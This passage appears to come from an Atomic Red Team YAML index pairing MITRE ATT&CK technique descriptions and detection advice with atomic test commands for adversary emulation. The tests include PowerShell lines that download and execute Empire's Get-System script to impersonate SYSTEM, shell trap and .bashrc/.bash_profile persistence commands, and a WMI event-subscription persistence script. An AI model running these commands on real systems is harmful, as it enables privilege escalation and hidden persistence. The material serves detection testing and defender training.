(Citation: TechNet Autoruns) + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_contributors: + - Scott Lundgren, @5twenty9, Carbon Black + x_mitre_platforms: + - Windows + atomic_tests: [] + T1134.001: + technique: + created: '2020-02-18T16:39:06.289Z' + modified: '2020-03-26T21:29:18.608Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d + description: |- + Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. + + An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system. + name: Token Impersonation/Theft + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1134.001 + url: https://attack.mitre.org/techniques/T1134/001 + - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing + description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved + April 21, 2017. 
+ source_name: Microsoft Command-line Logging + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Command: Command Execution' + x_mitre_detection: |- + If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) + + Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. + x_mitre_defense_bypassed: + - Windows User Account Control + - System access controls + - File system access controls + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1134.001 + atomic_tests: + - name: Named pipe client impersonation + auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966 + description: |- + Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. + When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). 
+ + Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ + supported_platforms: + - windows + executor: + command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' + -UseBasicParsing); Get-System -Technique NamedPipe -Verbose + name: powershell + elevation_required: true + - name: "`SeDebugPrivilege` token duplication" + auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0 + description: |- + Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process. + When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). + supported_platforms: + - windows + executor: + command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' + -UseBasicParsing); Get-System -Technique Token -Verbose + name: powershell + elevation_required: true + T1546.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.005 + url: https://attack.mitre.org/techniques/T1546/005 + - source_name: Trap Manual + url: https://ss64.com/bash/trap.html + description: ss64. (n.d.). trap. Retrieved May 21, 2019. + - source_name: Cyberciti Trap Statements + url: https://bash.cyberciti.biz/guide/Trap_statement + description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, + 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Trap + description: |- + Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. 
The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. + + Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements) + id: attack-pattern--63220765-d418-44de-8fae-694b3912317d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T16:43:02.273Z' + created: '2020-01-24T14:17:43.906Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: Trap commands must be registered for the shell or programs, + so they appear in files. Monitoring files for suspicious or overly broad trap + commands can narrow down suspicious behavior during an investigation. Monitor + for suspicious processes executed through trap interrupts. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - macOS + - Linux + identifier: T1546.005 + atomic_tests: + - name: Trap + auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 + description: | + After exiting the shell, the script will download and execute. + After sending a keyboard interrupt (CTRL+C) the script will download and execute. 
+ supported_platforms: + - macos + - linux + executor: + command: | + trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT + exit + trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt + name: sh + T1546.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.004 + url: https://attack.mitre.org/techniques/T1546/004 + - source_name: intezer-kaiji-malware + url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ + description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware + turning to Golang. Retrieved December 17, 2020.' + - source_name: bencane blog bashrc + url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/ + description: Benjamin Cane. (2013, September 16). Understanding a little more + about /etc/profile and /etc/bashrc. Retrieved February 25, 2021. + - source_name: anomali-rocke-tactics + url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect + description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining + Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved + December 17, 2020. + - source_name: Linux manual bash invocation + url: https://wiki.archlinux.org/index.php/Bash#Invocation + description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021. + - source_name: Tsunami + url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ + description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware + Targets DVRs, Forms Botnet. Retrieved December 17, 2020. + - source_name: anomali-linux-rabbit + url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat + description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot + Malware Out of a Hat. 
Retrieved December 17, 2020. + - source_name: Magento + url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html + description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection + Vector. Retrieved December 17, 2020. + - source_name: ScriptingOSX zsh + url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/ + description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration + Files. Retrieved February 25, 2021.' + - source_name: PersistentJXA_leopitt + url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5 + description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell + for macOS. Retrieved January 11, 2021. + - source_name: code_persistence_zsh + url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js + description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. + Retrieved January 11, 2021. + - source_name: ESF_filemonitor + url: https://objective-see.com/blog/blog_0x48.html + description: Patrick Wardle. (2019, September 17). Writing a File Monitor + with Apple's Endpoint Security Framework. Retrieved December 17, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Unix Shell Configuration Modification + description: "Adversaries may establish persistence through executing malicious + commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s + execute several configuration scripts at different points throughout the session + based on events. For example, when a user opens a command-line interface or + remotely logs in (such as via SSH) a login shell is initiated. The login shell + executes scripts from the system (/etc) and the user’s home directory + (~/) to configure the environment. 
All login shells on a system + use /etc/profile when initiated. These configuration scripts run at the permission + level of their directory and are often used to set environment variables, + create aliases, and customize the user’s environment. When the shell exits + or terminates, additional shell scripts are executed to ensure the shell exits + appropriately. \n\nAdversaries may attempt to establish persistence by inserting + commands into scripts automatically executed by shells. Using bash as an example, + the default shell for most GNU/Linux systems, adversaries may add commands + that launch malicious binaries into the /etc/profile and /etc/profile.d + files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These + files typically require root permissions to modify and are executed each time + any shell on a system launches. For user level permissions, adversaries can + insert malicious commands into ~/.bash_profile, ~/.bash_login, + or ~/.profile which are sourced when a user opens a command-line + interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: + Linux manual bash invocation) Since the system only executes the first existing + file in the listed order, adversaries have used ~/.bash_profile + to ensure execution. Adversaries have also leveraged the ~/.bashrc + file which is additionally executed if the connection is established remotely + or an additional interactive shell is opened, such as a new tab in the command-line + interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: + Magento) Some malware targets the termination of a program to trigger execution, + adversaries can use the ~/.bash_logout file to execute malicious + commands at the end of a session. \n\nFor macOS, the functionality of this + technique is similar but may leverage zsh, the default shell for macOS 10.15+. 
+ When the Terminal.app is opened, the application launches a zsh login shell + and a zsh interactive shell. The login shell configures the system environment + using /etc/profile, /etc/zshenv, /etc/zprofile, + and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: + code_persistence_zsh) The login shell then configures the user environment + with ~/.zprofile and ~/.zlogin. The interactive + shell uses the ~/.zshrc to configure the user environment. Upon + exiting, /etc/zlogout and ~/.zlogout are executed. + For legacy programs, macOS executes /etc/bashrc on startup." + id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-08T15:22:54.089Z' + created: '2020-01-24T14:13:45.936Z' + x_mitre_contributors: + - Robert Wilson + - Tony Lambert, Red Canary + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: "While users may customize their shell profile files, there + are only certain types of commands that typically appear in these files. Monitor + for abnormal commands such as execution of unknown programs, opening network + sockets, or reaching out across the network when user profiles are loaded + during the login process.\n\nMonitor for changes to /etc/profile + and /etc/profile.d, these files should only be modified by system + administrators. 
MacOS users can leverage Endpoint Security Framework file + events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor + most Linux and macOS systems, a list of file paths for valid shell options + available on a system are located in the /etc/shells file.\n" + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - Linux + - macOS + identifier: T1546.004 + atomic_tests: + - name: Add command to .bash_profile + auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f + description: 'Adds a command to the .bash_profile file of the current user + +' + supported_platforms: + - macos + - linux + input_arguments: + command_to_add: + description: Command to add to the .bash_profile file + type: string + default: "/path/to/script.py" + executor: + command: 'echo "#{command_to_add}" >> ~/.bash_profile + +' + name: sh + - name: Add command to .bashrc + auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f + description: 'Adds a command to the .bashrc file of the current user + +' + supported_platforms: + - macos + - linux + input_arguments: + command_to_add: + description: Command to add to the .bashrc file + type: string + default: "/path/to/script.py" + executor: + command: 'echo "#{command_to_add}" >> ~/.bashrc + +' + name: sh + T1055.014: + technique: + id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5 + description: "Adversaries may inject malicious code into processes via VDSO + hijacking in order to evade process-based defenses as well as possibly elevate + privileges. Virtual dynamic shared object (vdso) hijacking is a method of + executing arbitrary code in the address space of a separate live process. + \n\nVDSO hijacking involves redirecting calls to dynamically linked shared + libraries. 
Memory protections may prevent writing executable code to a process + via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). + However, an adversary may hijack the syscall interface code stubs mapped into + a process from the vdso shared object to execute syscalls to open and map + a malicious shared object. This code can then be invoked by redirecting the + execution flow of the process via patched memory address references stored + in a process' global offset table (which store absolute addresses of mapped + library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace + VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in + the context of another process may allow access to the process's memory, system/network + resources, and possibly elevated privileges. Execution via VDSO hijacking + may also evade detection from security products since the execution is masked + under a legitimate process. " + name: VDSO Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055.014 + url: https://attack.mitre.org/techniques/T1055/014 + - source_name: ELF Injection May 2009 + url: https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html + description: O'Neill, R. (2009, May). Modern Day ELF Runtime infection via + GOT poisoning. Retrieved March 15, 2020. + - source_name: Backtrace VDSO + url: https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/ + description: backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. + Retrieved June 15, 2020. + - source_name: VDSO Aug 2005 + url: https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/ + description: Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved + June 16, 2020. 
+ - source_name: Syscall 2014 + url: https://lwn.net/Articles/604515/ + description: Drysdale, D. (2014, July 16). Anatomy of a system call, part + 2. Retrieved June 16, 2020. + - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: + Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved + December 20, 2017.' + source_name: ArtOfMemoryForensics + - url: https://www.gnu.org/software/acct/ + description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved + December 20, 2017. + source_name: GNU Acct + - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing + description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - + Chapter 7 - System Auditing. Retrieved December 20, 2017. + source_name: RHEL auditd + - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html + description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. + Retrieved December 20, 2017. + source_name: Chokepoint preload rootkits + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-06-20T22:28:45.232Z' + created: '2020-01-14T01:35:00.781Z' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace + and mmap, that can be used to attach to, manipulate memory, then redirect + a processes' execution path. 
Monitoring for Linux specific calls such as the + ptrace system call should not generate large amounts of data due to their + specialized nature, and can be a very effective method to detect some of the + common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: + GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) + \n\nAnalyze process behavior to determine if a process is performing actions + it usually does not, such as opening network connections, reading files, or + other suspicious actions that could relate to post-compromise behavior. " + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Module: Module Load' + x_mitre_platforms: + - Linux + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1078: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078 + url: https://attack.mitre.org/techniques/T1078 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html + - url: https://technet.microsoft.com/en-us/library/dn535501.aspx + description: Microsoft. (2016, April 15). Attractive Accounts for Credential + Theft. Retrieved June 3, 2016. + source_name: TechNet Credential Theft + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. + source_name: TechNet Audit Policy + description: |- + Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. 
Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. + + The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + name: Valid Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-12T18:27:52.298Z' + created: '2017-05-31T21:31:00.645Z' + x_mitre_version: '2.2' + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_defense_bypassed: + - Firewall + - Host intrusion prevention systems + - Network intrusion detection system + - Application control + - System access controls + - Anti-virus + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. 
Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_effective_permissions: + - User + - Administrator + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + - Google Workspace + - Containers + x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team + - Netskope + - Mark Wee + - Praetorian + x_mitre_is_subtechnique: false + atomic_tests: [] + T1546.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.003 + url: https://attack.mitre.org/techniques/T1546/003 + - url: https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf + description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the + Front Lines. Retrieved May 18, 2016.' + source_name: Mandiant M-Trends 2015 + - source_name: FireEye WMI SANS 2015 + url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf + description: Devon Kerr. (2015). There's Something About WMI. Retrieved May + 4, 2020. + - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf + description: Ballenthin, W., et al. (2015). 
Windows Management Instrumentation + (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. + source_name: FireEye WMI 2015 + - url: https://www.secureworks.com/blog/wmi-persistence + description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, + March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. + source_name: Dell WMI Persistence + - source_name: Microsoft MOF May 2018 + url: https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- + description: Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved + January 24, 2020. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - description: French, D. (2018, October 9). Detecting & Removing an Attacker’s + WMI Persistence. Retrieved October 11, 2019. + url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 + source_name: Medium Detecting WMI Persistence + - source_name: Elastic - Hunting for Persistence Part 1 + url: https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 + description: 'French, D., Murphy, B. (2020, March 24). Adversary tradecraft + 101: Hunting for persistence using Elastic Security (Part 1). Retrieved + December 21, 2020.' + - source_name: Microsoft Register-WmiEvent + url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 + description: Microsoft. (n.d.). Retrieved January 24, 2020. 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Windows Management Instrumentation Event Subscription + description: |- + Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015) + + Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) + + WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. + id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-13T21:32:54.094Z' + created: '2020-01-24T14:07:56.276Z' + x_mitre_contributors: + - Brent Murphy, Elastic + - David French, Elastic + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. 
Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1) + + Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process). + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'WMI: WMI Creation' + x_mitre_platforms: + - Windows + identifier: T1546.003 + atomic_tests: + - name: Persistence via WMI Event Subscription + auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 + description: | + Run from an administrator powershell window. After running, reboot the victim machine. + After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. 
+ + Code references + + https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af + + https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + supported_platforms: + - windows + executor: + command: | + $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + EventNameSpace='root\CimV2'; + QueryLanguage="WQL"; + Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; + $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs + + $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} + $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs + + $FilterToConsumerArgs = @{ + Filter = [Ref] $Filter; + Consumer = [Ref] $Consumer; + } + $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs + cleanup_command: | + $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue + $FilterConsumerBindingToCleanup | Remove-WmiObject + $EventConsumerToCleanup | Remove-WmiObject + $EventFilterToCleanup | Remove-WmiObject + name: powershell + elevation_required: true + T1543.003: + technique: + created: '2020-01-17T19:13:50.402Z' + modified: 
'2020-09-16T15:49:58.490Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1543.003 + url: https://attack.mitre.org/techniques/T1543/003 + - external_id: CAPEC-478 + source_name: capec + url: https://capec.mitre.org/data/definitions/478.html + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - url: https://technet.microsoft.com/en-us/library/cc772408.aspx + description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. + source_name: TechNet Services + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 + description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service + was installed in the system. Retrieved August 7, 2018.' + source_name: Microsoft 4697 APR 2017 + - url: https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection + description: Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding + to help with intrusion detection. Retrieved August 7, 2018. + source_name: Microsoft Windows Event Forwarding FEB 2018 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Windows Service + description: "Adversaries may create or modify Windows services to repeatedly + execute malicious payloads as part of persistence. 
When Windows boots up, + it starts programs or applications called services that perform background + system functions.(Citation: TechNet Services) Windows service configuration + information, including the file path to the service's executable or recovery + programs/commands, is stored in the Windows Registry. Service configurations + can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). + \n\nAdversaries may install a new service or modify an existing service by + using system utilities to interact with services, by directly modifying the + Registry, or by using custom tools to interact with the Windows API. Adversaries + may configure services to execute at startup in order to persist on a system.\n\nAn + adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) + by using a service name from a related operating system or benign software, + or by modifying existing services to make detection analysis more challenging. + Modifying existing services may interrupt their functionality or may enable + services that are disabled or otherwise not commonly used. \n\nServices may + be created with administrator privileges but are executed under SYSTEM privileges, + so an adversary may also use a service to escalate privileges from administrator + to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). 
" + id: attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32 + x_mitre_contributors: + - Matthew Demaske, Adaptforward + - Travis Smith, Tripwire + - Pedro Harrison + x_mitre_data_sources: + - 'Service: Service Creation' + - 'Service: Service Modification' + - 'Process: Process Creation' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_detection: "Monitor processes and command-line arguments for actions + that could create or modify services. Command-line invocation of tools capable + of adding or modifying services may be unusual, depending on how systems are + typically used in a particular environment. Services may also be modified + through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) + and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional + logging may need to be configured to gather the appropriate data. Remote access + tools with built-in features may also interact directly with the Windows API + to perform these functions outside of typical system utilities. Collect service + utility execution and service binary path arguments used for analysis. Service + binary paths may even be changed to 